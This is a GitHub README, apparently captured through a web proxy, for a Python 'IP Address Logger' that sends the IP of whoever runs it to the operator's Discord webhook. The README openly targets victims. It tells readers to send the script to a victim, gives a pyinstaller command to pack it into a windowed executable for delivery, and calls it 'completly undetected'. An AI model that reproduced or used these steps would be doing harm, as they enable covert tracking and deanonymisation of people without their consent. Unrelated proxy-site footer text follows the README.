Skip to content

asisamko/IP-Logger-Webhook

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

10 Commits
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

Simple IP Address Logger

A simple IP Address Logger for Discord Webhook written in Python. πŸ“‘

πŸ‘€ Features

  • βœ… Customizable Webhook address and name
  • βœ… Shows IP details directly in the webhook
  • βœ… Completly undetected
  • βœ… Simple to use
  • ⌚ I`m releasing .EXE builder very soon (I have some problems)
  1. After you open the file it will grab your IP Address and send it to a Discord Webhook
  2. You can send the Python script to the victim or convert it to the .EXE file with pyinstaller Tutorial below

πŸ“Έ Webhook preview

App Screenshot

πŸ“ Download and Usage

  • Create a Discord Webhook on your server and copy the address

  • Download the script

  git clone https://github.com/asisamko/IP-Logger-Webhook.git

or Code > Download ZIP

  • Install dependencies
  pip install -r requirements.txt
  • Edit the webhook address and name in the logger.py

  • Run the code (CMD / Terminal)

  python logger.py

πŸ’Ύ How to convert

  • Install pyinstaller with pip
  pip install pyinstaller
  • Build the executable file
  pyinstaller --noconfirm --onefile --windowed --name "exe-file-name"  "this-python-script-path"
  • You should get an executable file that you can send to the victim

This project is still in development as you can see ;)

About

IP Address Logger connected to your Discord Webhook 😎

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy